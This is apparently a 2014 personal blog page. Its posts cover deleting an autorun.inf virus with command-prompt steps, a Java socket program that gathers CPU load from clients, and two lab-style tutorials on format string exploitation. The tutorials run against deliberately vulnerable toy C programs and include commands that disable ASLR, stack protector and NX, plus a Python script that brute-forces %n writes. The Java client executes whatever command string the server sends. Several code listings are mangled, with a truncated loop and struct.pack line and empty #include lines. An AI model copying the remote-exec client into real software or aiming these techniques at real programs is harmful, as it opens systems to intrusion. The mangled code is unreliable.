Thursday 29 May 2014

Removing autorun virus from windows machines

Autorun virus prevents from opening the drives in windows machines by double clicking on the icon. Here is a simple way to remove the virus.

Start > Run > cmd

Type the following commands :
> cd\
> attrib -r -h -s autorun.inf
> del autorun.inf

To go to next partition (eg : drive D)
> d:

continue above steps.
Restart the system. Done !!
Posted by at 1 comment:

Finding CPU load : Client-server architecture

Task :
Design a distributed application using Socket. Application consists of a server which requests CPU loads to n clients and finds the maximum and minimum loaded systems.

To find CPU load of a single local machine, see this previous post .


Server.java :


public class Server extends Thread
{
   private ServerSocket serverSocket;
  
   public Server(int port) throws IOException
   {
      serverSocket = new ServerSocket(port);
      serverSocket.setSoTimeout(30000);
   }

   public void run()
   {
     int p1=0,p2=0;
     float max,min;
     int j=0,i;
     float a[]=new float [10];
     String clients[]=new String [10];
      while(true)
      {
         try
         {
           clients[j]="";
           String cmd="";
           float y;
            System.out.println("Port ready to connect: " + serverSocket.getLocalPort());
            Socket server = serverSocket.accept();
            System.out.println("Connected");
            DataInputStream in = new DataInputStream(server.getInputStream());
            DataOutputStream out = new DataOutputStream(server.getOutputStream());
            out.writeUTF("mpstat");
            cmd=in.readUTF();
            y=Float.parseFloat(cmd);
            y=100-y;
            clients[j]=""+server.getRemoteSocketAddress();
            a[j]=y;
            j++;
            System.out.println("CPU load:"+y);
            server.close();
         }catch(SocketTimeoutException s)
         {
            System.out.println("Socket timed out!");
            break;
         }catch(IOException e)
         {
            System.out.println(e);
            break;
         }
      }
        max=a[0];
        min=a[0];
        for(i=1; i         {
          if(max < a[i]){
            max=a[i];
            p1=i;
          }
          else if(min > a[i]){
            min=a[i];
            p2=i;
          }
       
        System.out.println();
        System.out.println("\nMax Load: "+max+" from "+clients[p1]);
        System.out.println("Min Load: "+min+" from "+clients[p2]);
      }
   }
   public static void main(String [] args)
   {
      int port = 5555;
      try
      {
         Thread t = new Server(port);
         t.start();
      }catch(IOException e)
      {
         e.printStackTrace();
      }
   }
}



Client.java :

public class Client
{
   public static void main(String [] args)
   {
      String serverName = "server_ip";
      int port = 5555;
      try
      {
         System.out.println("Connecting to " + serverName + " on port " + port);
         Socket client = new Socket(serverName, port);
         System.out.println("connected");
         OutputStream outToServer = client.getOutputStream();
         DataOutputStream out = new DataOutputStream(outToServer);
         InputStream inFromServer = client.getInputStream();
         DataInputStream in = new DataInputStream(inFromServer);
         String x=in.readUTF();
         Process p=Runtime.getRuntime().exec(x);
         BufferedReader inbuf=new BufferedReader(new InputStreamReader(p.getInputStream()));
         String l=null;
         int i=1;
         String y="";
         while((l=inbuf.readLine()) != null && i < 4)
           i++;
         if(i>1)
           System.out.println("Action completed");
         for(i=l.length()-5; i < l.length(); i++)
           y=y+l.charAt(i);
         out.writeUTF(y);
         client.close();
      }catch(IOException e)
      {
         e.printStackTrace();
      }
   }
}






Posted by at No comments:

Thursday 22 May 2014

Exploiting format string vulnerability -Part 3

This time we will add some more fun to format string exploitation. Newcomers please go through these posts part1 and part2 for better understanding of the basics of format string exploitation.

Task :
Set the value of target to 0xbeefbeef

Program :
// to be compiled as `gcc -o 3 3.c -m32`
#include
int target = 0;
int main(int argc, char **argv)
{
char buf[100];
strncpy(buf, argv[1], 100);
printf(buf);
if ( target == 0xbeefbeef )
printf("Pat yourself on the back for me, wont you?\n");
else
printf("\nYikes, the value of target=%08x\n", target);
return 0;
}

Disabling all counter mechanisms against buffer overflow attack and format string
exploitation :
Disabling address randomization using the following command:
#sysctl -w kernel.randomize_va_space=0
Disabling stack guard
# gcc -fno-stack-protector -o example example.c
Disabling NX protection
# gcc -z execstack -fno-stack-protector -o example example.c

To get the output we need to change the content of the global variable 'target'. In the program, the value is not changed anywhere and so the comparison condition always
returns false.
Our task is to find the address of variable target and rewrite the content with 'beefbeef '
By exploiting the format string vulnerability of ' printf ', we can output the contents of address locations in memory.



We input some characters (AAAA here )and out put the contents in memory. Observe for
the values 41414141 which is correspondent to AAAA. Thus we now know an address
location and we can overwrite the content there.

Using gdb we can find out the address of 'target' and we will put that address in AAAA's
position. So the content at this particular address will be overwritten with 48879 (beef) .We need to overwrite the adjacent address also(since we need beefbeef)
address : 0x804a024

I am writting 48864 instead of 48879. Why? This is left for the reader to find out.
(hint : I have already written some characters ,so the count of those characters should be subtracted. Understand properly what printf is actually doing.)

output :


Posted by at No comments:

Exploiting format string vulnerability- Part 2

In my previous post about format string vulnerability, I have explained how to use the global variable to alter the program control flow. This is a continuation. Here, we will see the same example code once again but the variable 'flag' as local variable. (To understand the difference, please read the previous post ).

Task :
Give input such that “You entered right parameter” is printed out.

Program :

#include
#include
int main(int argc, char **argv)
{
char password[255];
int flag;
flag = 0;
strncpy(password, argv[1], 255);
printf("\nEntered password is : ");
printf(password);
printf("\n");
if(flag)
{
printf("You entered right parameter\n");
}
else
{
printf("wrong input\n");
}
return 0;
}

....................................

The flag is not a global variable here. The flag is a local variable in main function which means it will be kept within the stack.
Get the address of ' flag' using the gdb. As we did in the previous exploitation we can
overwrite the content of address where the value of flag is stored. But since it is in stack ,
there may be a slight change in address where we compile the program outside gdb. So
we need to test all the addresses around the address we got from gdb inspection. We
need to write a script that tries to do this task.

(python script)

import struct
from subprocess import call
for i in range (0,100):
x=0xffffd301+i
print hex(x)
y=struct.pack("print y
call(["./2","AAA"+y+"%8$n"])

The address got from gdb is 0xffffd2ec




Printed and tried to overwrite the addresses around this address (if no correct result is obtained, replace the address in for loop with the last address we have checked so far and continue running in loop until we get the correct output)

Exit gdb and try outside of gdb.



Posted by at No comments:
Subscribe to: Posts (Atom)